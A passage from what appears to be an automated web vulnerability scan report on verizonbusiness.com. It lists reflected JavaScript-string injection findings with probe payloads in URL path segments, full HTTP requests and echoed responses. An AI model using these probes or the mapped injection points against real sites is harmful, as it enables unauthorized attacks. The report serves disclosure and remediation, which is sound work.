Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:43:11 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40690
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:43:11 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:43:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products5d0e5";2d5f6bef341/communications/traditional-telephony/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALID
...[SNIP]...

1.68. http://www.verizonbusiness.com/Products/communications/traditional-telephony/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/traditional-telephony/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69431'%3bff4558fa136 was submitted in the REST URL parameter 1. This input was echoed as 69431';ff4558fa136 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products69431'%3bff4558fa136/communications/traditional-telephony/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:43:49 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40690
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:43:49 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:43:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products69431';ff4558fa136/communications/traditional-telephony/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.69. http://www.verizonbusiness.com/Products/communications/traditional-telephony/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/traditional-telephony/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2dec1"%3bac9d6812890 was submitted in the REST URL parameter 2. This input was echoed as 2dec1";ac9d6812890 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications2dec1"%3bac9d6812890/traditional-telephony/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:12 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42355
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:12 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/communications2dec1";ac9d6812890/traditional-telephony/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM E
...[SNIP]...

1.70. http://www.verizonbusiness.com/Products/communications/traditional-telephony/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/traditional-telephony/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a88f3'%3bad0bd57bd2c was submitted in the REST URL parameter 2. This input was echoed as a88f3';ad0bd57bd2c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communicationsa88f3'%3bad0bd57bd2c/traditional-telephony/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:44:42 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 42355
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:42 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:42 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/communicationsa88f3';ad0bd57bd2c/traditional-telephony/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.71. http://www.verizonbusiness.com/Products/communications/traditional-telephony/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/traditional-telephony/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0571'%3b3c9c2508f89 was submitted in the REST URL parameter 3. This input was echoed as d0571';3c9c2508f89 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications/traditional-telephonyd0571'%3b3c9c2508f89/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:31 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43500
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/communications/traditional-telephonyd0571';3c9c2508f89/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.72. http://www.verizonbusiness.com/Products/communications/traditional-telephony/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/traditional-telephony/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b962"%3b576fb33505f was submitted in the REST URL parameter 3. This input was echoed as 3b962";576fb33505f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications/traditional-telephony3b962"%3b576fb33505f/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:06 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43500
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/communications/traditional-telephony3b962";576fb33505f/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.73. http://www.verizonbusiness.com/Products/communications/ucc/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/ucc/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 637a6"%3b296beb7d083 was submitted in the REST URL parameter 1. This input was echoed as 637a6";296beb7d083 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products637a6"%3b296beb7d083/communications/ucc/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:43:46 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40654
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:43:46 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:43:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products637a6";296beb7d083/communications/ucc/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEM
...[SNIP]...

1.74. http://www.verizonbusiness.com/Products/communications/ucc/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/ucc/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f257'%3b68890547f97 was submitted in the REST URL parameter 1. This input was echoed as 4f257';68890547f97 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products4f257'%3b68890547f97/communications/ucc/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:05 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40654
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products4f257';68890547f97/communications/ucc/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.75. http://www.verizonbusiness.com/Products/communications/ucc/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/ucc/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfd1d'%3ba91da3eaeef was submitted in the REST URL parameter 2. This input was echoed as cfd1d';a91da3eaeef in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communicationscfd1d'%3ba91da3eaeef/ucc/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:30 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 42319
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:30 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/communicationscfd1d';a91da3eaeef/ucc/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.76. http://www.verizonbusiness.com/Products/communications/ucc/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/ucc/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e4eb"%3b03656175578 was submitted in the REST URL parameter 2. This input was echoed as 2e4eb";03656175578 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications2e4eb"%3b03656175578/ucc/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:24 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42319
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:24 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/communications2e4eb";03656175578/ucc/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT
...[SNIP]...

1.77. http://www.verizonbusiness.com/Products/communications/ucc/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/ucc/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44e5e'%3b3fc27c4ce6f was submitted in the REST URL parameter 3. This input was echoed as 44e5e';3fc27c4ce6f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications/ucc44e5e'%3b3fc27c4ce6f/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:18 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43464
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:19 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:18 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/communications/ucc44e5e';3fc27c4ce6f/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.78. http://www.verizonbusiness.com/Products/communications/ucc/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/ucc/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8a09"%3bab440ed2f3d was submitted in the REST URL parameter 3. This input was echoed as f8a09";ab440ed2f3d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications/uccf8a09"%3bab440ed2f3d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:49 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43464
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:49 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
{}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/communications/uccf8a09";ab440ed2f3d/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.79. http://www.verizonbusiness.com/Products/it/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc451'%3b89dc88df858 was submitted in the REST URL parameter 1. This input was echoed as fc451';89dc88df858 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsfc451'%3b89dc88df858/it/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:04 GMT
Content-Type: text/html
Content-Length: 40624
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:04 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Productsfc451';89dc88df858/it/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.80. http://www.verizonbusiness.com/Products/it/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec00a"%3b0a9aa0a024a was submitted in the REST URL parameter 1. This input was echoed as ec00a";0a9aa0a024a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsec00a"%3b0a9aa0a024a/it/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
